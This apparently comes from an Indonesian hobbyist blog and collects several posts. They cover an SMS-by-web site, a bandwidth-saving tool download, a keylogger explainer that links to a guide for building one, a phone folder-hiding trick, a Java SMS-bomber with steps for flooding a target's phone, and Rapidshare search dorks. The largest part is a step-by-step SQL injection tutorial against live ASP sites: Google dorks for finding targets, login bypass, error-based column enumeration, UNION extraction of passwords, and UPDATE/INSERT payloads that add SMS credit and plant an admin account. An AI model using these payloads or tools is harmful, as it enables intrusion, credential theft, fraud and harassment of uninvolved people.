ORAK-ARIK Dunia IT

ternyata sekarang tekhnologi sudah semakin canggih aja .

mulai sekarang ada lagi yang kirim sms lewat internet, masa' bisa ??

tenang aja . .

silahkan anda masuk sini :

http://sms.balicode.com/index3.php

coba aja, liat caranya di situ .

Dengan bantuan software ini, kita bisa menghemat biaya internet untuk yang mengaksesnya melalui GPRS atau yang pembayaran internet berdasarkan volume based / ukuran KB dalam bandwith (yang dimaksudkan bukan time based).

Saya belum mengetahui benar dengan tool ini. tetapi saat dicoba oleh teman saya yang menggunakan koneksi dengan dial-up connection atau handphone, ternyata terbukti. lebih cepat dari sebelumnya yang sering putus koneksi.

Tool ini mirip seperti toonel, fungsinya mengompress file yang diload / dikeluarkan dari internet sesuai kebutuhan browser, tetapi dengan beberapa tambahan :
1. Mempunyai cache agar browsing lebih cepat lagi.
2. Bisa blok trojan downloader maupun konten virus lain yang membahayakan.
3. Bisa blok situs yang tidak dikehendaki seperti advertiser.
4. Bisa blok konten berbau pornografi dengan menambahkan kata pada filter konten.
5. Bisa menghemat uang anda dari bandwidth yang disave dari kompresi maupun cache.

coba lihat screen shootnya :



@info
jadi dengan software ini kita bisa Menghemat Biaya Pemakaian Internet.


oke, langsung saja jika anda membutuhkannya silahkan download klik disini atau silahkan anda klik link dibawah ini
http://www.fileden.com/files/2008/10/9/2135535/Setup%20Internet%20Speed-Up%20V.1.12%20Final%2010%20Oct%202008.zip

selamat mencoba . . .

Keylogger merupakan sebuah alat atau software yang mampu merekam aktifitas penekanan tombol pada keyboard. Sebagai “ancaman klasik” akan keamanan, sampai saat ini tidak ada metode yang benar-benar ampuh menghapus 100% ancaman akan keylogger.

Keylogger juga merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.

Seiring dengan semakin berkembangnya pemanfaatan Teknologi Informasi yang ditandai dengan revolusi komunikasi menggunakan media internet, berbagai kemudahan dalam melaksanakan aktifitas sehari-hari juga semakin meningkat. Jika dahulu ketika kita ingin berbelanja suatu barang kita harus datang langsung ke tokonya, maka kini dengan menggunakan internet kita dapat berbelanja dari rumah atau kantor dan kemudian tinggal menunggu barang yang kita pesan tiba di rumah. Aktifitas seperti ini yang sering disebut dengan e-commerce, disamping memudahkan proses jual-beli, juga membawa potensi untuk disalahgunakan.

Sering kita dengar di berita-berita tentang pencurian nomor kartu kredit, password e-mail, dan sebagainya. Salah satu metode yang sering digunakan untuk memperoleh data-data pribadi seperti itu adalah dengan menggunakan keylogger. Keylogger merupakan sebuah alat atau sebuah perangkat lunak yang dapat digunakan untuk merekam aktifitas penekanan tombol pada keyboard sehingga pengguna yang tidak tahu apa-apa, secara lengah memasukkan data pribadi seperti password melalui sebuah komputer yang telah dipasangi keylogger oleh pihak yang tidak bertanggungjawab.

Tulisan ini membahas tentang cara kerja dan pembuatan keylogger software serta antinya pada sistem operasi Windows. Perlu diingat bahwa segala istilah keylogger yang penulis gunakan di sini mengacu kepada keylogger software.

untuk selanjutnya silahkan anda download di link bawah ini.

Membuat Keylogger dan Antinya pada Sistem Operasi Windows

referensi :
. ilmuwebsite.com
. ilmukomputer.org

Gimana sih cara menyembunyikan folder di memory card (MC) yang tertanam di HP ??
pasti teman2 kebingungan yaa?
kadang kalo folder di hidden lewat komputer nanti pas di pasang ke HP lagi ga keliatan alias hilang. hehehehe

trik ini sendiri saya dapat dari teman saya.
mudah kog. :))

ceritanya langsung ke trik aja yaaa...
saya menggunakan nokia.

pertama2 : masuk ke gallery pilih memory card anda.

kedua : pastikan sudah ada target folder yang mau di hidden/sembunyikan, klo sudah pilih 'pilihan' terus ubah nama folder.
misalnya: folder teman2 namanya 'pedasmaniscinta' terus rubah saja jadi 'pedasmaniscinta.ota' ...

jadi sebenarnya mudah kog,
tinggal ganti nama folder dan di akhiri dengan .ota
sudah jelas kan?

mungkin ini hanya work,
di nokia s'40 atau diatasnya..
k;lo ericson coba dulu yaaa..
kalo bisa angan lupa kasih koment. :))

BOMB SMS ,,
apa yaaa itu ? bomb SMS sama halnya dengan bomb email yang pernah dimuat disini cara mudah ngeBomb email orang lain.

jadi intinyaa, teman - teman bisa ngrim SMS yang buanyak sekali ke orang lain, tapi pulsa ditanggung penumpang yaaa hahahaha
ingat! perbuatan ini merugikan orang lain, jadi jangan disalah gunakan yaaa guys hahaha :p

disini PedasManisCinta menggunakan aplikasi SMS-Bomber berbasis java
jadi teman - teman semua bisa langsung gunakan aplikasi ini langsung dari handphone yang berbasis java juga hahaha

silahkan download aplikasinya disini :
http://www.ziddu.com/download/13869358/SMS-Bomber.jar.html

untuk cara menggunakannya mudah kog,
1. download file diatas lewat PC / klo lewat Hape bisa langsung aja dibuka aplikasinya. (yang download lewat PC pindahin ke Hape dulu yaaa) ingat untuk HP berbasis JAVA yaa.

2. Setelah aplikasi terbuka akan ada 2 opsi; Target Number dan Message Count
untuk Target Number -> pasti tau kan :p
Message count -> untuk pilihan berapa pesan SMS yang akan dikirimkan (isi 100 juga boleh tu hahaha)

3. setelah itu klik okeee, akan ada pilihan lagi Enter Mesagge
masukan pesan terakhir anda untuk teman yang anda jail ii hehehe

4. tinggal klik SEND dan lihat berapa pesan yang akan dikirim hahahahahah :D


ingat yaaaa!
- aplikasi untuk Hape berbasis JAVA
- pulsa pengiriman SMS ditanggung penumpang hehe (ane saranin pake provider yang kasih banyak bonus SMS)
- ingat DOSA hehe

sampai disini dulu yaaaaaaaaaaaaaaaaaa

1. To search for ebooks and documents in PDF format on Rapidshare:
pdf "rapidshare.de/files" site:rapidshare.de

2.To download movies and video files:
+inurl:avimpgwmv site:rapidshare.de

3. To download mp3 files from rapidshare:
+inurl:wmamp3 site:rapidshare.de

4.To download software, zipped files, programs from rapidshare:
+inurl:exerarzip site:rapidshare.de

Hallo Semua? Apakabar? Sorry Sudah Lama Offline? ini ada sedikit cerpen tentang cara hack sebuah Website ,tapi jangan di gunakan untuk kejahatan ya

::PREFACE::
============ =
Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari
yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-
ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalam
teknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin
cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam
website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan
lain lain. Diantara jenis lainnya MS-SQL adalah yang paling
terkenal, nah ternyata semua hal yang di jagad maya ini adalah
Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target
dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa
pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe
untuk menginject sql ini anda perlu memperhatikan input-inputan
dalam situs itu yang sekiranya connect dengan SQL database situs
itu, atau bisa juga dengan menambah dari link url di kotak browser
anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari
target yang vuln seperti kondisi diatas anda perlu mencarinya
yang .asp nah seperti biasa....GOOGLING! !! hehehe
key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa
jauh anda kreatif dalam mencari target di google.nah, kanre disini
gw bahas cara inject ke situs web to sms so searchnya : asp,web to
sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan
yang masuk ke database itu ga, misalnya search product, member
login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu
nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C
itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak
dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti
diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs
berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya
connect ke database situs itu, contoh isa di login, member, search,
dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject,
kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi
dungs? ok kita loop lagi sekarang kita inject : ' group by
UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini
kita gunain perintah group by untuk menggroup kolom ingin kita
lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe
penerapan selanjutanya adalah misal situs itu adalah situs
pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms
dari web, namun harus ada account yang digunakan untuk mengirim sms
itu, jadi account itu harus ada nilainya dan untuk itu kita harus
mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe
so kita inject aja....sebelumnya kita harus jadi member kan gratis
ini daftarnya...
setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log
ke situs itu dengan id kita, cari tahu string khusus yang digunakan
web itu untuk menghitung account sms kita, misalnya : cell
nah, inilah injectnya... .cari login inputan lagi misal /member.asp
nah disitu ada input box id dan pass...kita Inject dengan :
' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]
= '[char_id]'- -
contoh :
' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)
sep, nah klo muncul error : userid not found kita isa cari input di
forgot password : dengan inputan sama...jreeen ketika di jalankan ga
ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu
itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES
BRO!!! :)

atau cara ke 2

::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw
jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya
kalau
baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga
akan
kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan
yang
lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu
browsernya agar bisa melihat errornya. Setting di Tools-Internet
option-Advanced tab-Show friendly HTTP error messages. itu musti
dilakukan, kalau
tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi
artikel
Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di
input boxnya :

www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang
dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln
engganya tuh
situs kita ketikan ' having 1=1-- di input box atau URL error tadi ,
contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table
Users,
stringnya : ' group by UserID --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini
stringnya
adalah ' group by
field1,field2 --
contoh : ' group by UserID,ClientName --
then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai
semua
field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :)
apabila sudah lama melakukan looping dan akhirnya ketika group
terakhir
kita lakukan dan tidak keluar error messagesnya maka error yang
terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali,
tergantung admin yang masangnya jadi susah kalau maen teabk2an
ajah....contoh field yang pernah gw temuin : ' group by
UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
,
OperatingSystem, PrefferredGraphi cFormat
-- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari
siapa
aja user yang ada dalam table Users dan kolom UserName...
caranya? kita pake Union apa itu UNION??? union adalah perintah SQL
dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen
gunain
Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah
kalau
begitu kita masukin syntax sql union untuk melihat username : '
union
select min(UserName) ,1,1,1 from Users where username > 'a'--
jadi hasilnya : select * from Users where UserName ==' union select
min(UserName) ,1,1,1 from Users where username > 'a'--and
Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error
messages lagi
yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake
string union tadi nanti akan muncul username2 lain....lalu bagaimana
dengan
passwordnya? ??
ok union beraksi kembali : ' union select min
(UserName),1, 1,1,1,1,1, 1,1
from Users where username > 'Agile'--
lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya
Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. ....
caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,'a@a.com',1)-- >> artinya kita
masukan id kita dalam

urutan 0, lalu username 'lucifer', password 'lucifer' Fname
(frontName)
itu 'lu',
Lname(LastName) sebagai 'cid', dan EmailAddress 'a@a.com'......
coba kita login dengan user buatan kita tadi....BINGO! selamat anda
berhasil menjebol

database situs target.....